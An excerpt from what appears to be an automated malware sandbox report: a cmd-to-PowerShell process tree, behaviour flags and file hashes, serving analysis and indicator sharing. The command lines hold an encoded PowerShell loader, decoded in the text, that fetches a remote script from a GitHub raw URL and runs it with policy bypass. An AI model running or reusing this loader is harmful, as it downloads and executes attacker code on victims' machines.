  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  (The -enc argument is UTF-16LE base64 and decodes to: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config.)
  PID: 1356
  Level 2: C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID: 852
    Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID: 1176
Network
MITRE ATT&CK Enterprise v6
Downloads
- MD5: 2dfbc484274d246b95685b39d1d85a73
  SHA1: f390d8273f8eeb7d04e521a1c293b503998536ce
  SHA256: 414434de279b95d644edb71c54f613b77792cb9dd4122007ddd2e8b5cdd17be1
  SHA512: 98f33852a64beac4ecae6e2cf08d38dff3cea5c7cdc0f378f9a399ca2d6b645b8d82c46c088a85ad91b886436b88657255320ee2a41df0879f099d9356ffe457
- MD5: 88f64f83b0347a89de94d39c922de8be
  SHA1: 6f6994a18df262aad0d2b50b7e8b27b6b310b7a4
  SHA256: 2f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5
  SHA512: 9450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8
- MD5: 7d4057365f857501253e0273336b7256
  SHA1: 62375a5303e4a59e95cf7e0072cd58efa187b7f2
  SHA256: 003e6c8d0f15c6eb4738ea99f9fd99457d43d65e9d4f15506446db4b51b02079
  SHA512: 7059a22ba6020db18f7b86e09b816bedd0a9f208818dcb98c69a647f6aee18ffaf4c60c3725bdfa8a354a7244b9c32fc07c3fc0d807ca39dda69842681a9fd6c
- MD5: 88f64f83b0347a89de94d39c922de8be
  SHA1: 6f6994a18df262aad0d2b50b7e8b27b6b310b7a4
  SHA256: 2f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5
  SHA512: 9450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8
- MD5: 109dfda879c2954ab2c86c465af694b1
  SHA1: 318bec946966f6640d4a8cc2f615d8ff46e0e598
  SHA256: 74a6499a65d4b1df96a8db88714fb75f6ffe99b84d39c4d492ec840df0f9bf67
  SHA512: afb8077b538ce66fe6c998e10699369f7151ba35e78e08c5cc82d78f48c0662bf729f2a0dd666dc755841a939c1212ddc55132ab4ae441f341dfa01122bfe977
- MD5: f83ab141e29899ceb5308dabde894a0e
  SHA1: 6ea46bb7102125fa5d39b77547dab28ec346e9f9
  SHA256: ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
  SHA512: d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
- MD5: f83ab141e29899ceb5308dabde894a0e
  SHA1: 6ea46bb7102125fa5d39b77547dab28ec346e9f9
  SHA256: ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
  SHA512: d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
- MD5: f83ab141e29899ceb5308dabde894a0e
  SHA1: 6ea46bb7102125fa5d39b77547dab28ec346e9f9
  SHA256: ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
  SHA512: d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
- MD5: e7173515ef44feb1ee618484b7743e93
  SHA1: 8f976bf1da030655afd0f43e0a357a58a2ea9178
  SHA256: 7875f52e1f97a463783456b6b3c2dbc85f183534b5281ba72b0574529139d86b
  SHA512: 41830f7036e32679bf274c67390dd6bca9f6286ee8d3144d0e57ca39fdca1ec1a8273fb528ffed819444b183067ab6078bfaa0e82d16deed3fac47a1cf027361
- MD5: 95564bb3195d0e6212166252031905c6
  SHA1: 0ec9abf3449221a6bba295e592d91e18ca8c6e98
  SHA256: 5571e382fbdafd85dba0dae53b5edd5e1f005c0e452b5df35eeccc37f1caf1e8
  SHA512: 27efdd8e8e0aade58deb6bf4fd6e0fc1d2907bd1019ecd89648380fde69d4211b5213dca548cbe8800e2d1f5fdb62a364e7311a0f8393cb22663ebe3af92991b
- MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- MD5: 91f2ffa1c3ed8abba9ce6a3a8f63ae61
  SHA1: 0686c03aedfa4a0a17397da8dbb7e73cea42fa33
  SHA256: 069a95878671a32398ba592ad95049a9bff8b727849465d73c17382eb53869f8
  SHA512: 91473dfbf6b058b9ff70b38b1a7c82046b130c44e349e90b97eb651198b0a64a201ea64b03877e3179b2cb8c729a9fb0a54c408206d8f06c8a71197d3fba93ae
- MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
- MD5: fddc192a7202700523abca2181e381ff
  SHA1: 2e9dc45d95b1709d9c916659707080038ff30bb2
  SHA256: 2ba72332376b66c49b7ed12ad090e2814c5cb5a0282a870a7d5f8fe29c4be944
  SHA512: 04a6a5de331430f6e5e93a93df3e983d11ae08387888dd3fd318f163a7361f5fcec3ae3f26fc3dbd1275765950182801c7566736497f50f0395b0407eb53f22d
- MD5: b9d40d12f521cfe49ac35b6048ced8f1
  SHA1: 0c55968f67fb0773d4871de7182ce1f621527da4
  SHA256: 4be8c5939401129c5c04c7c5f20dbca2ad7368cb7411698a8c70dbd2a6e7246a
  SHA512: ce3bf88cb518ef911d015c739dab25b8e761c833b0dc57f392f69f1de701eb139eabbb2b294be9efa15f2331361ef409456101f7b5004bd4324993865d6d5f70
- MD5: 7ddf5fb0ee8289cc286b454a7b53a603
  SHA1: 065aeffcc062d442671b3f67df6473bee9367b3a
  SHA256: 8f55881188f7be83a94148b548fee913bde5d658ea462dd9e4dc5945e41197e7
  SHA512: 7783144e8b92512d4e9bf23664d56bdab30f3c97a3e7d31d4ca233f7f47bd69983e7f5f9f2469b420146460ae514b9c891a66aad06077f06d1df1cf9b15581a4
- MD5: 667d42e1a5ba6c7a929e8e77262a9861
  SHA1: dd73058c4d6b851f3c347410342a0b7a9b2a689a
  SHA256: a6a996d5e38ac43969a5151393e87aa85b79d1a5bb4449ca1328c610e8803a1c
  SHA512: 7fb5611eba143a32faf3e20637c649ed78535578f7f64750b52586b3fbf738ad07a40f61fe7840204a7ee8d42fb75d7e6213579c7f4df114f3e135e72825bb53